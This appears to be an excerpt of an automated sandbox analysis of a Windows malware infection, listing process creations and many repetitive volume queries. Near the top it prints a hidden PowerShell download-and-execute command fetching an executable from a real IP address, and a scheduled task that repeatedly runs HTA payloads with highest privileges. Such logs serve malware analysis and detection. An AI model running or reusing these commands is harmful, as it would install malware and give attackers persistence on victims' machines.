Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" any_word
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "C:\Temp\.hta"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe "C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe	Code function: 2_2_6C584760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free, 2_2_6C584760
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe	Code function: 2_2_6C461C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint, 2_2_6C461C30
Source: 31FYMQUCQX14ZVCZU2HAYNV7V.exe, 00000005.00000002.2009313233.00000000006C1000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, skotes.exe, 00000006.00000002.2049997565.00000000011E1000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe, 00000007.00000002.2049697799.00000000011E1000.00000040.00000001.01000000.0000000A.sdmp	Binary or memory string: Program Manager
Source: DLTDCR8UJINP8YM8Y.exe, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2274307439.0000000000B48000.00000040.00000001.01000000.00000006.sdmp	Binary or memory string: 1FProgram Manager
Source: iSHmPkn.exe, 00000010.00000002.2504764685.0000000000874000.00000040.00000001.01000000.00000010.sdmp	Binary or memory string: MProgram Manager
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe	Code function: 2_2_6C53AE71 cpuid 2_2_6C53AE71
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\5EfYBe3nch.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1026818021\am.cmd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1026818021\am.cmd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1026850001\rsn.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1026850001\rsn.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
